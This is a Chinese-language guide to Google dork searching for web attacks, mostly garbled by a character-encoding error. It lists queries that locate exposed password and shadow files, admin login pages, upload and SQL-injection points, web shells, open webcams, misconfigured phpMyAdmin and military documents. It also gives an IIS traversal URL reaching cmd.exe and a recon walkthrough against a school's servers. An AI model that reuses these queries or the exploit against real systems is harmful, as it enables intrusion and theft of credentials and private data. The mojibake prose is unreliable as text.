²ì¿´»ù±¾Çé¿ö£º
info:xx.org ·µ»ØһЩ»ù±¾ÐÅÏ¢
site:xx.org ·µ»ØËùÓÐÓë¸ÃÓйصÄurl`````````````````````````````Ò»°ãÊÇ¿´ËûµÄÖ÷ÒªÎļþºÍ²¿·ÖĿ¼
link:xx.org ·µ»ØËùÓÐÓë¸ÃÕ¾×öÁËÁ¬½ÓµÄÕ¾
site:xx.org filetype:txt ²éÕÒTXTÎļþ ÆäËûµÄÒÀ´ÎÄÚÍÆ``````TXT£¬ÓÐʱºòÔÚÕ¾ÀïÃæ¿ÉÒÔÕÒµ½ftpÃÜÂë
²éÕÒºǫ́```````````````````````````````````````````````````````````Äõ½ÃÜÂëºó£¬»òÕß³¢ÊÔor£¬»òÕß¿´°æȨʱÓõ½
site:xx.org intext:¹ÜÀí
site:xx.org inurl:login
site:xx.org intitle:ºǫ́
²é¿´·þÎñÆ÷ʹÓõijÌÐò``````````````````````````````````````````Ò»°ã¿´Ö÷»úʲôϵͳ£¬¶ÔÓ¦µÄÂí¾ÍʲôȨÏÞ
site:xx.org filetype:asp
site:xx.org filetype:php
site:xx.org filetype:jsp
site:xx.org filetype:aspx
²é¿´ÉÏ´«Â©¶´£º``````````````````````````````````````````````````Õâ¿ÉÊÇ×îˬµÄÄÃshell·½·¨
site:xx.org inurl:file
site:xx.org inurl:load
²éÕÒ×¢Éäµã£º`````````````````````````````````````````````````````ÕÒ×¢Éäµã×î¿ìµÄ·½·¨
site:xx.org filetype:asp
ÒÔÉÏÓï·¨¿ÉÒÔ¸´ºÏʹÓÃ
ÀûÓÃGoogleÍ»ÆÆ·âËø:ÏÂÔØÏëÒªµÄ¶«Î÷
µÚһƪ Í»ÆÆ·âËøÖ®µç×ÓÊé¡¢¶àýÌåÏÂÔØ
¡¡¡¡ÔÚËÑË÷¿òÉÏÊäÈ룺
¡¡¡¡ "index of/ " inurl:lib
¡¡¡¡ÔÙ°´ËÑË÷Ä㽫½øÈëÐí¶àͼÊé¹Ý£¬²¢ÇÒÒ»¶¨ÄÜÏÂÔØ×Ô¼ºÏ²»¶µÄÊé¼®¡£
¡¡¡¡ÔÚËÑË÷¿òÉÏÊäÈ룺
¡¡¡¡ "index of /" cnki
¡¡¡¡ÔÙ°´ËÑË÷Äã¾Í¿ÉÒÔÕÒµ½Ðí¶àͼÊé¹ÝµÄCNKI¡¢VIP¡¢³¬ÐǵÈÈë¿Ú£¡
¡¡¡¡ÔÚËÑË÷¿òÉÏÊäÈ룺
¡¡¡¡"index of /" ppt
¡¡¡¡ÔÙ°´ËÑË÷Äã¾Í¿ÉÒÔÍ»ÆÆÍøÕ¾Èë¿ÚÏÂÔØpowerpint×÷Æ·£¡
¡¡¡¡ÔÚËÑË÷¿òÉÏÊäÈ룺
¡¡¡¡"index of /" mp3
¡¡¡¡ÔÙ°´ËÑË÷Äã¾Í¿ÉÒÔÍ»ÆÆÍøÕ¾Èë¿ÚÏÂÔØmp3¡¢rmµÈÓ°ÊÓ×÷Æ·£¡
¡¡¡¡ÔÚËÑË÷¿òÉÏÊäÈ룺
¡¡¡¡"index of /" swf
¡¡¡¡ÔÙ°´ËÑË÷Äã¾Í¿ÉÒÔÍ»ÆÆÍøÕ¾Èë¿ÚÏÂÔØflash×÷Æ·£¡
¡¡¡¡ÔÚËÑË÷¿òÉÏÊäÈ룺
¡¡¡¡"index of /" ÒªÏÂÔصÄÈí¼þÃû
¡¡¡¡ÔÙ°´ËÑË÷Äã¾Í¿ÉÒÔÍ»ÆÆÍøÕ¾Èë¿ÚÏÂÔØÈí¼þ£¡
¡¡¡¡×¢ÒâÒýºÅÓ¦ÊÇÓ¢Îĵģ¡
¡¡¡¡ÔÙ͸¶һÏ£¬Èç¹ûÄãÊäÈ룺
¡¡¡¡"index of /" AVI
¡¡¡¡ÕâÑù¾Í¿ÉÒÔÏÂÔØAVI¸ñʽµÄÊÓƵÎļþÁËà¸
¡¡¡¡µÚ¶þƪ Í»ÆÆ·âËøÖ®¿´ÊÀ½ç
¡¡¡¡ÓÃGoogle¿´ÊÀ½ç!!!Ö»ÒªÄãÔÚGoogleÀïÊäÈëÌØÊâµÄ¹Ø¼ü×Ö,¾Í¿ÉÒÔËѵ½Êýǧ¸öÉãÏóÍ·µÄIPµØÖ·!ͨ¹ýËûÄã¾Í¿ÉÒÔ¿´µ½ÆäËùÉãµÄʵʱӰÏó!!
¡¡¡¡ÔÚgoogleÀïÊäÈ룺
¡¡¡¡inurl:"viewerframe?mode="
¡¡¡¡Ëæ±ã´ò¿ªÒ»¸ö,È»ºó°´Ìáʾװһ¸ö²å¼þ,¾Í¿ÉÒÔ¿´µ½ÁË!!!
¡¡¡¡µÚÈýƪ Í»ÆÆ·âËøÖ®GoogleÊǺڿ͵ÄÀÖÔ°
¡¡¡¡ÈýÔòºÚ¿ÍµÄGoogleËÑË÷¼¼Çɼò½é
¡¡¡¡´ó¼Ò¶¼ÖªµÀ£¬GoogleºÁÎÞÒÉÎÊÊǵ±½ñÊÀ½çÉÏ×îÇ¿´óµÄËÑË÷ÒýÇ档Ȼ¶ø£¬ÔÚºÚ¿ÍÊÖÖУ¬ËüÒ²ÊÇÒ»¸öÃØÃÜÎäÆ÷£¬ËüÄÜËÑË÷µ½Ò»Ð©ÄãÒâÏë²»µ½µÄÐÅÏ¢¡£ÈüµÏ±àÕß°ÑËûÃǽøÐÐÁ˼òµ¥µÄ×ܽ᲻ÊÇÏ£ÍûÄúÀûÓÃËûÈ¥¹¥»÷±ðÈ˵ÄÍøÕ¾£¬¶øÊÇÀûÓÃÕâЩ¼¼ÇÉÈ¥ÔÚºÆÈçÑ̺£µÄÍøÂçÐÅÏ¢ÖУ¬À´¸ö´óº£ÀÌÕ룬ѰÕÒµ½¶ÔÄúÓÐÓõÄÐÅÏ¢¡£
¡¡¡¡Èç¹ûÄúÊÇÒ»ÃûÆÕͨÍøÃñ£¬Äú¿ÉÒÔʹÓúڿ͵ļ¼ÇÉÀ©´ó×Ô¼ºµÄÊÓÒ°£¬Ìá¸ß×Ô¼ºµÄ¼ìË÷ЧÂÊ£»Èç¹ûÄúÊÇÒ»ÃûÍø¹Ü£¬ÇëÄú¸Ï¿ì¿´¿´ÄúµÄÍøÕ¾ÊÇ·ñ×öºÃÁ˶ÔÏÂÃæºÚ¿Í̽²âÊֶεķÀ·¶´ëÊ©£¬Èç¹ûûÓо͸ϿìÀ´¸öÍöÑò²¹ÀΣ¬±Ï¾¹Òþ»¼Ê¤ÓÚÃ÷»ð£¬·À·¶Ê¤ÓÚ¾ÈÔÖ£»Èç¹ûÄúÊÇÒ»ÃûºÚ¿Í£¬ÏàÐÅÄúÔçÒÔÔÚ±ðµÄºÚ¿ÍÕ¾µãÉϼû¹ýÀàËƵķ½·¨£¬ÕâƪÎÄÕ¶ÔÄúûʲôÓô¦£¬ÕâÀïµÄ¼¼ÇɶÔÄúÊÇС¶ù¿Æ£¬²ËÄñ¼¶£¡Äú¿ÉÒÔ½ÚÊ¡±¦¹óµÄʱ¼ä×ö¸üÓÐÒâÒåµÄÊÂÇ飬ÕâƪÎÄÕÂÄú²»Óÿ´ÁË£¬µ½±ð´¦È¥°É£¡
¡¡2 ¡¢²éÕÒ PDF Îļþ
¡¡¡¡ÏÖÔÚ GOOGLE µÄËÑË÷½á¹ûÖаüÀ¨ÁË PDF Îļþ¡£¾¡¹Ü PDF Îļþ²»Èç HTML ÎļþÄÇô¶à£¬µ«ËûÃǾ³£¾ß±¸Ò»Ð©ÆäËûÎļþ²»¾ß±¸µÄ¸ßÖÊÁ¿ÐÅÏ¢
¡¡¡¡ÎªÁËÏÔʾһ¸öËÑË÷½á¹ûÊÇ PDF Îļþ¶ø²»ÊÇÍøÒ³£¬ PDF ÎļþµÄ±êÌ⿪ͷÏÔʾÀ¶É«Îı¾¡£
¡¡¡¡Õâ¾ÍÊÇÈÃÄãÖªµÀ ACRTOBAT READER ³ÌÐò»áÆô¶¯À´ÔĶÁÎļþ
¡¡¡¡Èç¹ûÄãµÄ¼ÆËã»úûװÓиóÌÐò£¬¼ÆËã»ú»áÖ¸µ¼ÄãÈ¥ÄÜÃâ·ÑÏÂÔظóÌÐòµÄÍøÒ³¡£
¡¡¡¡Ê¹Óà PDF Îļþʱ£¬Ïà¹ØµÄÍøÒ³¿ìÕÕ»áÓÉ“ TEXT VERSION ”´úÌ棬ËüÊÇ PDF ÎĵµµÄ¸´ÖÆÎļþ£¬¸ÃÎļþ³ýÈ¥ÁËËùÓиñʽ»¯ÃüÁî¡£
¡¡¡¡Èç¹ûÄãÔÚûÓÐ PDF Á´½ÓµÄÇé¿öÏÂÏ뿴һϵÁÐËÑË÷½á¹û£¬Ö»ÒªÔÚËÑË÷À¸ÖдòÉÏ -inurldf ¼ÓÉÏÄãµÄËÑË÷Ìõ¼þ¡£
¡¡¡¡3 ¡¢¹ÉƱ±¨¼Û
¡¡¡¡Óà Google ²éÕÒ¹ÉƱºÍ¹²Óлù½ðÐÅÏ¢£¬Ö»ÒªÊäÈëÒ»¸ö»ò¶à¸ö NYSE £¬ NASDAQ £¬ AMEX »ò
¡¡¡¡¹²Óлù½ðµÄ¹ÉƱÐÐÇé×Ô¶¯ÊÕ¼»úµÄ´úÂ룬Ҳ¿ÉÒÔÊäÈëÔÚ¹ÉÊпª»§µÄ¹«Ë¾Ãû×Ö¡£
¡¡¡¡Èç¹û Google ʶ±ð³öÄã²éѯµÄÊǹÉƱ»òÕß¹²Óлù½ð£¬Ëü»Ø¸´µÄÁ´½Ó»áÖ±½ÓÁ¬µ½¸ßÖÊÁ¿µÄ½ðÈÚÐÅÏ¢ÌṩÕßÌṩµÄ¹ÉƱºÍ¹²Óлù½ðÐÅÏ¢¡£
¡¡¡¡ÔÚÄãËÑË÷½á¹ûµÄ¿ªÍ·ÏÔʾµÄÊÇÄã²éѯµÄ¹ÉÊÐÐÐÇé×Ô¶¯ÊÕ¼Æ÷µÄ´úÂë¡£Èç¹ûÄãÒª²éÕÒÒ»¼Ò¹«Ë¾µÄÃû×Ö£¨±ÈÈ磬 INTEL £©£¬Çë²é¿´“¹ÉƱ±¨¼Û”ÔÚ Google ËÑË÷½á¹ûµÄ½ðÈÚÀ¸Àï»áÓÐÄǸö¹«Ë¾µÄÖ÷Ò³µÄÁ´½Ó£¨±ÈÈ磬 www.INTEL.COM £©¡£
¡¡¡¡Google ÊÇÒÔÖÊÁ¿Îª»ù´¡À´Ñ¡ÔñºÍ¾ö¶¨½ðÈÚÐÅÏ¢ÌṩÕߵģ¬°üÀ¨µÄÒòËØÓÐÏÂÔØËٶȣ¬Óû§½çÃæ¼°Æ书ÄÜ¡£
¡¡¡¡4 ¡¢ÕÒÕÒ˺ÍÄãÁ´½Ó
¡¡¡¡ÓÐЩµ¥´ÊÈç¹û´øÓÐðºÅ¾Í»áÓÐÌØÊâµÄÒâ˼¡£±ÈÈç link £º²Ù×÷Ô±¡£²éѯ link:siteURL £¬¾Í»áÏÔʾËùÓÐÖ¸ÏòÄǸö URL µÄÍøÒ³¡£¾ÙÀýÀ´Ëµ£¬Á´½Ó www.Google.com »áÏòÄãÏÔʾËùÓÐÖ¸Ïò GOOGLE Ö÷Ò³µÄÍøÒ³¡£µ«ÕâÖÖ·½·¨²»ÄÜÓë¹Ø¼ü×Ö²éѯÁªºÏʹÓá£
¡¡¡¡5 ¡¢²éÕÒÕ¾µã
¡¡¡¡µ¥´Ê site ºóÃæÈç¹û½ÓÉÏðºÅ¾ÍÄܹ»½«ÄãµÄËÑË÷ÏÞ¶¨µ½Ä³¸öÍøÕ¾¡£¾ßÌå×ö·¨ÊÇ£ºÔÚ c ËÑË÷À¸ÖÐʹÓà site:sampledomain.com Õâ¸öÓï·¨½á¹¹¡£±ÈÈ磬ÔÚ˹̹¸£ÕÒÉêÇëÐÅÏ¢£¬ÊäÈ룺
¡¡¡¡admission site:www.stanford.edu
¡¡¡¡6 ¡¢²éÕÒ×ÖµäÊÍÒâ
¡¡¡¡²éÕÒ×ÖµäÊÍÒâµÄ·½·¨ÊÇÔÚËÑË÷À¸ÖÐÊäÈëÄãÒª²éѯµÄÄÚÈÝ¡£ÔÚÎÒÃǸù¾ÝÒªÇóÕÒµ½ËùÓеÄ×ÖµäÊÍÒⶼ»á±êÓÐÏ»®Ïߣ¬Î»ÓÚËÑË÷½á¹ûµÄÉÏÃ棬µã»÷Á´½ÓÄã»áÕÒµ½×ÖµäÌṩÕ߸ù¾ÝÒªÇó¸ø³öµÄÏà¹Ø¶¨Òå¡£
7 ¡¢Óà GOOLGE ²éÕÒµØͼ
¡¡¡¡ÏëÓà Google ²éÕÒ½ÖÇøµØͼ£¬ÔÚ Google ËÑË÷À¸ÖÐÊäÈëÃÀ¹ú½ÖÇøµØÖ·£¬°üÀ¨ÓʵÝÇøºÅ»ò³ÇÊÐ/ÖÝ£¨±ÈÈç 165 ´óѧ´ó½Ö PALO ALTO CA £©¡£Í¨³£Çé¿öÏ£¬½ÖÇøµØÖ·ºÍ³ÇÊеÄÃû×Ö¾Í×ã¹»ÁË¡£
¡¡¡¡µ± Google ʶ±ðÄãµÄÒªÇóÊDzéÕÒµØͼ£¬Ëü»á·´À¡¸øÄãÓиßÖÊÁ¿µØͼÌṩÕßÌṩµÄÁ´½Ó£¬Ê¹ÄãÖ±½ÓÕÒµ½Ïà¹ØµØͼ¡£ÎÒÃÇÊÇÒÔÖÊÁ¿Îª»ù´¡Ñ¡ÔñÕâЩµØͼÌṩÕß¡£ÖµµÃ×¢ÒâµÄÊÇ Google ºÍʹÓõĵØͼÐÅÏ¢ÌṩÕßûÓÐÈκιØÁª¡£
ËÑË÷URL
¡¡¡¡±ÈÈçÎÒÃÇÌá½»ÕâÖÖÐÎʽ£ºpasswd.txt site:virtualave.net
¡¡¡¡¿´µ½ÁËʲô£¿ÊDz»ÊǾõµÃÌ«²»¿É˼ÒéÁË£¡Óкܶà»ùÓÚCGI/PHP/ASP ÀàÐ͵ÄÁôÑÔ°å´æÔÚÕâÖÖÎÊÌâ¡£ÓÐʱÎÒÃǵõ½ÃÜÂëÉõÖÁ»¹ÊÇÃ÷ÂëµÄ£¡¹ÜÀíÔ±»òÐíÌ«²»¸ºÔðÁË£¬»òÐí°²È«·À·¶µÄÒâʶ̫²îÁË£¬Èç¹ûÄãÊÇÍøÂç¹ÜÀíÔ±£¬¸Ï¿ì¼ì²éһϲ»ÒªÈöñÒâ¹¥»÷Õß¼ñÁ˱ãÒË¡£²»ÒªÌ«ÏàÐÅDES¼ÓÃÜ£¬¼´Ê¹ÎÒÃǵÄÃÜÂë¾¹ýDES ¼ÓÃܵÄÃÜÂ룬ºÚ¿ÍÃÇ»¹ÊÇ¿ÉÒÔͨ¹ýÐí¶àÆƽâÈí¼þÀ´¸ã¶¨¡£
¡¡¡¡Õâ´ÎÎÒÃÇÄܵõ½°üº¬ÃÜÂëµÄÎļþ¡£“site:virtualave.net”Òâ˼ÊÇÖ»ËÑË÷ virutalave.net µÄURL¡£virutalave.netÊÇÒ»¸öÍøÂç·þÎñÆ÷ÌṩÉÌ¡£
¡¡¡¡Í¬Ñù£¬ÎÒÃÇ¿ÉÒÔËÑË÷һЩ¶¥¼¶ÓòÃû£¬±ÈÈ磺.net .org .jp .in .gr
¡¡¡¡config.txt site:.jp
¡¡¡¡admin.txt site:.tw
¡¡¡¡ËÑË÷Ê×Ò³µÄĿ¼
¡¡¡¡Ê×Ò³ÊǷdz£ÓÐÓõģ¬Ëü»áÌṩ¸øÄãÐí¶àÓÐÓõÄÐÅÏ¢¡£
¡¡¡¡ÎÒÃÇÌá½»ÈçϵÄÐÎʽ£º
¡¡¡¡"Index of /admin"
¡¡¡¡"Index of /secret"
¡¡¡¡"Index of /cgi-bin" site:.edu
¡¡¡¡Äã¿ÉÒÔ×Ô¼º¶¨ÒåËÑË÷µÄÊ×Ò³×Ö·û¡£ÕâÑù¾Í¿ÉÒÔ»ñµÃÐí¶àÐÅÏ¢¡£
¡¡¡¡ËÑË÷Ìض¨µÄÎļþÀàÐÍ
¡¡¡¡±ÈÈçÄãÏëÖ¸¶¨Ò»ÖÖÎļþµÄÀàÐÍ£¬¿ÉÒÔÌá½»ÈçÏÂÐÎʽ£º
¡¡¡¡filetype:.doc site:.mil classified
¡¡¡¡Õâ¸ö¾ÍÊÇËÑË÷¾ü·½µÄ×ÊÁÏ£¬Äã¿ÉÒÔ×Ô¶¨ÒåËÑË÷¡£
³£ÓõÄgoogle¹Ø¼ü×Ö£º
foo1 foo2 (Ò²¾ÍÊǹØÁª£¬±ÈÈçËÑË÷xx¹«Ë¾ xxÃÀÅ®)
operator:foo
filetype:123 ÀàÐÍ
site:foo.com Ïà¶ÔÖ±½Ó¿´ÍøÕ¾¸üÓÐÒâ˼£¬¿ÉÒԵõ½Ðí¶àÒâÍâµÄÐÅÏ¢
intext:foo
intitle: fooltitle ±êÌâŶ
allinurl:foo ËÑË÷xxÍøÕ¾µÄËùÓÐÏà¹ØÁ¬½Ó¡££¨²Èµã±Ø±¸£©
links:foo ²»ÒªËµ¾ÍÖªµÀÊÇËüµÄÏà¹ØÁ´½Ó
allintilte:foo.com
ÎÒÃÇ¿ÉÒÔ¸¨Öú"-" "+"À´µ÷ÕûËÑË÷µÄ¾«È·³Ì¶È
Ö±½ÓËÑË÷ÃÜÂ룺(ÒýºÅ±íʾΪ¾«È·ËÑË÷)
µ±È»ÎÒÃÇ¿ÉÒÔÔÙÑÓÉìµ½ÉÏÃæµÄ½á¹ûÀï½øÐжþ´ÎËÑË÷
"index of" htpasswd / passwd
filetype:xls username password email
"ws_ftp.log"
"config.php"
allinurl:admin mdb
service filetype:pwd ....»òÕßij¸ö±ÈÈçpcanywhereµÄÃÜÂëºó׺cifµÈ
Ô½À´Ô½ÓÐÒâ˼ÁË£¬ÔÙÀ´µã¸üÃô¸ÐÐÅÏ¢
"robots.txt" "Disallow:" filetype:txt
inurl:_vti_cnf (FrontPageµÄ¹Ø¼üË÷ÒýÀ²£¬É¨ÃèÆ÷µÄCGI¿âÒ»°ã¶¼ÓеØ)
allinurl: /msadc/Samples/selector/showcode.asp
/../../../passwd
/examples/jsp/snp/snoop.jsp
phpsysinfo
intitle:index of /admin
intitle:"documetation"
inurl: 5800(vncµÄ¶Ë¿Ú)»òÕßdesktop portµÈ¶à¸ö¹Ø¼ü×Ö¼ìË÷
webmin port 10000
inurl:/admin/login.asp
intext:Powered by GBook365
intitle:"php shell*" "Enable stderr" filetype:php Ö±½ÓËÑË÷µ½phpwebshell
foo.org filetype:inc
ipsec filetype:conf
intilte:"error occurred" ODBC request where (select|insert) ˵°×Á˾ÍÊÇ˵£¬¿ÉÒÔÖ±½ÓÊÔ×Ųé²éÊý¾Ý¿â¼ìË÷£¬Õë¶ÔÄ¿Ç°Á÷ÐеÄsql×¢É䣬»á·¢´ïŶ
"Dumping data for table" username password
intitle:"Error using Hypernews"
"Server Software"
intitle:"HTTP_USER_AGENT=Googlebot"
"HTTP_USER_ANGET=Googlebot" THS ADMIN
filetype:.doc site:.mil classified Ö±½ÓËÑË÷¾ü·½Ïà¹Øword
¼ì²é¶à¸ö¹Ø¼ü×Ö£º
intitle:config confixx login password
"mydomain.com" nessus report
"report generated by"
"ipconfig"
"winipconfig"
google»º´æÀûÓã¨hoho£¬×îÓÐÓ°ÏìÁ¦µÄ¶«Î÷£©ÍƼö´ó¼ÒËÑË÷ʱºò¶à"Ñ¡ËÑË÷ËùÓÐÍøÕ¾"
ÌرðÍƼö£ºadministrator users µÈÏà¹ØµÄ¶«Î÷£¬±ÈÈçÃû×Ö£¬ÉúÈյȅ…×î²ÒÒ²¿ÉÒÔÄÃÀ´×ö×ÖµäÂï
……
һЩ¼¼Çɼ¯ºÏ£º
1) index.of.password
1) filetype:blt "buddylist"
2) "access denied for user" "using password"
2) intitle:"index of" inurl:ftp (pub | incoming)
3) "http://*:*@www" domainname
3) filetype:cnf inurl:_vti_pvt access.cnf
4) auth_user_file.txt
4) allinurl:"/*/_vti_pvt/" | allinurl:"/*/_vti_cnf/"
5) The Master List
5) inurl:"install/install.php"
6) allinurl: admin mdb
6) intitle:"welcome.to.squeezebox"
7) passlist.txt (a better way)
7) intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
8) "A syntax error has occurred" filetype:ihtml
8) intitle:Login intext:"RT is ? Copyright"
9) "# -FrontPage-" inurl:service.pwd
9) ext:php program_listing intitle:MythWeb.Program.Listing
10) ORA-00921: unexpected end of SQL command
10) intitle:index.of abyss.conf
NO2:
--------------------------------------------------------------------------------
google hackingµÄ¼òµ¥ÊµÏÖ
ʹÓÃgoogleÖеÄһЩÓï·¨¿ÉÒÔÌṩ¸øÎÒÃǸü¶àµÄÐÅÏ¢(µ±È»Ò²Ìṩ¸øÄÇЩϰ¹ß¹¥»÷µÄÈ˸ü¶àËûÃÇËùÏëÒªµÄ.),ÏÂÃæ¾ÍÀ´½éÉÜһЩ³£ÓõÄÓï·¨.
intext:
Õâ¸ö¾ÍÊÇ°ÑÍøÒ³ÖеÄÕýÎÄÄÚÈÝÖеÄij¸ö×Ö·û×öΪËÑË÷Ìõ¼þ.ÀýÈçÔÚgoogleÀïÊäÈë:intext:¶¯Íø.½«·µ»ØËùÓÐÔÚÍøÒ³ÕýÎIJ¿·Ö°üº¬"¶¯Íø"µÄÍøÒ³.allintext:ʹÓ÷½·¨ºÍintextÀàËÆ.
intitle:
ºÍÉÏÃæÄǸöintext²î²»¶à,ËÑË÷ÍøÒ³±êÌâÖÐÊÇ·ñÓÐÎÒÃÇËùÒªÕÒµÄ×Ö·û.ÀýÈçËÑË÷:intitle:°²È«Ììʹ.½«·µ»ØËùÓÐÍøÒ³±êÌâÖаüº¬"°²È«Ììʹ"µÄÍø
Ò³.ͬÀíallintitle:ҲͬintitleÀàËÆ.
cache:
ËÑË÷googleÀï¹ØÓÚijЩÄÚÈݵĻº´æ,ÓÐʱºòÒ²ÐíÄÜÕÒµ½Ò»Ð©ºÃ¶«Î÷Ŷ.
define:
ËÑË÷ij¸ö´ÊÓïµÄ¶¨Òå,ËÑË÷:define:hacker,½«·µ»Ø¹ØÓÚhackerµÄ¶¨Òå.
filetype:
Õâ¸öÎÒÒªÖصãÍƼöÒ»ÏÂ,ÎÞÂÛÊÇÈöÍøʽ¹¥»÷»¹ÊÇÎÒÃǺóÃæҪ˵µÄ¶ÔÌض¨Ä¿±ê½øÐÐÐÅÏ¢ÊÕ¼¯¶¼ÐèÒªÓõ½Õâ¸ö.ËÑË÷Ö¸¶¨ÀàÐ͵ÄÎļþ.ÀýÈçÊäÈë
:filetype:doc.½«·µ»ØËùÓÐÒÔdoc½áβµÄÎļþURL.µ±È»Èç¹ûÄãÕÒ.bak¡¢.mdb»ò.incÒ²ÊÇ¿ÉÒÔµÄ,»ñµÃµÄÐÅÏ¢Ò²Ðí»á¸ü·á¸»:)
info:
²éÕÒÖ¸¶¨Õ¾µãµÄһЩ»ù±¾ÐÅÏ¢.
inurl:
ËÑË÷ÎÒÃÇÖ¸¶¨µÄ×Ö·ûÊÇ·ñ´æÔÚÓÚURLÖÐ.ÀýÈçÊäÈë:inurl:admin,½«·µ»ØN¸öÀàËÆÓÚÕâÑùµÄÁ¬½Óhttp://www.xxx.com/xxx/admin,ÓÃÀ´ÕÒ¹ÜÀíÔ±µÇ
½µÄURL²»´í.allinurlҲͬinurlÀàËÆ,¿ÉÖ¸¶¨¶à¸ö×Ö·û.
link:
ÀýÈçËÑË÷:inurl:www.4ngel.net¿ÉÒÔ·µ»ØËùÓкÍwww.4ngel.net×öÁËÁ´½ÓµÄURL.
site:
Õâ¸öÒ²ºÜÓÐÓÃ,ÀýÈç:site:www.4ngel.net.½«·µ»ØËùÓкÍ4ngel.netÕâ¸öÕ¾ÓйصÄURL.
¶ÔÁË»¹ÓÐһЩ*×÷·ûÒ²ÊǺÜÓÐÓõÄ:
+ °Ñgoogle¿ÉÄܺöÂÔµÄ×ÖÁÐÈç²éѯ·¶Î§
- °Ñij¸ö×ÖºöÂÔ
~ ͬÒâ´Ê
. µ¥Ò»µÄͨÅä·û
* ͨÅä·û£¬¿É´ú±í¶à¸ö×Öĸ
"" ¾«È·²éѯ
ÏÂÃ濪ʼ˵˵ʵ¼ÊÓ¦ÓÃ
ÒÔÏÂÄÚÈݾùÔÚgoogleÉÏËÑË÷,¶ÔÓÚÒ»¸ö¾ÓÐÄØϲâµÄ¹¥»÷ÕßÀ´Ëµ,¿ÉÄÜËû×î¸ÐÐËȤµÄ¾ÍÊÇÃÜÂëÎļþÁË.¶øgoogleÕýÒòΪÆäÇ¿´óµÄËÑË÷ÄÜÁ¦ÍùÍù»á
°ÑһЩÃô¸ÐÐÅϢ͸¶¸øËûÃÇ.ÓÃgoogleËÑË÷ÒÔÏÂÄÚÈÝ:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
ÓÐʱºòÒòΪ¸÷ÖÖ¸÷ÑùµÄÔÒòһЩÖØÒªµÄÃÜÂëÎļþ±»ºÁÎÞ±£»¤µÄ±©Â¶ÔÚÍøÂçÉÏ,Èç¹û±»±ðÓÐÓÃÐĵÄÈË»ñµÃ,ÄÇôΣº¦ÊǺܴóµÄ
ͬÑù¿ÉÒÔÓÃgoogleÀ´ËÑË÷һЩ¾ßÓЩ¶´µÄ³ÌÐò,ÀýÈçZeroBoardÇ°¶Îʱ¼ä·¢ÏÖ¸öÎļþ´úÂë鶩¶´,¿ÉÒÔÓÃgoogleÀ´ÕÒÍøÉÏʹÓÃÕâÌ׳ÌÐòµÄÕ¾µã:
intext:ZeroBoard filetype:php
»òÕßʹÓÃ:
inurl:outlogin.php?_zb_path= site:.jp
À´Ñ°ÕÒÎÒÃÇËùÐèÒªµÄÒ³Ãæ.phpmyadminÊÇÒ»Ì×¹¦ÄÜÇ¿´óµÄÊý¾Ý¿â*×÷Èí¼þ,һЩվµãÓÉÓÚÅäÖÃʧÎó,µ¼ÖÂÎÒÃÇ¿ÉÒÔ²»Ê¹ÓÃÃÜÂëÖ±½Ó¶Ôphpmyadmin½øÐÐ*×÷.ÎÒÃÇ¿ÉÒÔÓÃgoogleËÑË÷´æÔÚÕâÑù©¶´µÄ³ÌÐòURL:
intitle:phpmyadmin intext:Create new database
»¹http://www.xxx.com/_vti_bin/..%5C..%5C..%5C..%5C..%5C../winnt/system32/cmd.exe?dirÂð?ÓÃgoogleÕÒÕÒ£¬ÄãÒ²Ðí»¹¿ÉÒÔÕÒµ½ºÜ¶à¹Å¶¼¶µÄ»úÆ÷¡£Í¬ÑùÎÒÃÇ¿ÉÒÔÓÃÕâ¸öÕÒÕÒÓÐÆäËûcgi©¶´µÄÒ³Ãæ¡£
allinurl£ºwinnt system32
Ç°ÃæÒѾ¼òµ¥µÄ˵¹ý¿ÉÒÔÓÃgoogleÀ´ËÑË÷Êý¾Ý¿âÎļþ,ÓÃÉÏһЩÓï·¨À´¾«È·²éÕÒÄܹ»»ñµÃ¸ü¶à¶«Î÷(accessµÄÊý¾Ý¿â,mssql¡¢mysqlµÄÁ¬½ÓÎļþµÈµÈ).¾Ù¸öÀý×ÓʾÀýÒ»ÏÂ:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data //ÔÚһЩÅäÖò»ÕýÈ·µÄapache+win32µÄ·þÎñÆ÷ÉϾ³£³öÏÖÕâÖÖÇé¿ö,ºÍÉÏÃæµÄÔÀíÒ»Ñù,ÎÒÃÇ»¹¿ÉÒÔÓÃgoogleÀ´ÕÒºǫ́.
ÀûÓÃgoogleÍêÈ«ÊÇ¿ÉÒÔ¶ÔÒ»¸öÕ¾µã½øÐÐÐÅÏ¢ÊÕ¼¯ºÍÉø͸µÄ£¬ÏÂÃæÎÒÃÇÓÃgoogle¶ÔÌض¨Õ¾µã½øÐÐÒ»´Î²âÊÔ¡£
Ê×ÏÈÓÃgoogleÏÈ¿´Õâ¸öÕ¾µãµÄһЩ»ù±¾Çé¿ö(һЩϸ½Ú²¿·Ö¾ÍÂÔÈ¥ÁË):
site:xxxx.com
´Ó·µ»ØµÄÐÅÏ¢ÖУ¬ÕÒµ½¼¸¸ö¸ÃУµÄ¼¸¸öϵԺµÄÓòÃû£º
http://a1.xxxx.com
http://a2.xxxx.com
http://a3.xxxx.com
http://a4.xxxx.com
˳±ãpingÁËһϣ¬Ó¦¸ÃÊÇÔÚ²»Í¬µÄ·þÎñÆ÷.ѧУһ°ã¶¼»áÓв»ÉٺõÄ×ÊÁÏ£¬ÏÈ¿´¿´ÓÐʲôºÃ¶«Î÷û
site:xxxx.com filetype:doc
µÃµ½N¸ö²»´íµÄdoc¡£
ÏÈÕÒÕÒÍøÕ¾µÄ¹ÜÀíºǫ́µØÖ·£º
site:xxxx.com intext:¹ÜÀí
site:xxxx.com inurl:login
site:xxxx.com intitle:¹ÜÀí
³¬¹ý»ñµÃ2¸ö¹ÜÀíºǫ́µØÖ·£º
http://a2.xxxx.com/sys/admin_login.asp
http://a3.xxxx.com:88/_admin/login_in.asp
»¹Ëã²»´í£¬¿´¿´·þÎñÆ÷ÉÏÅܵÄÊÇʲô³ÌÐò£º
site:a2.xxxx.com filetype:asp
site:a2.xxxx.com filetype:php
site:a2.xxxx.com filetype:aspx
site:a3.xxxx.com filetype:asp
site:.......
......
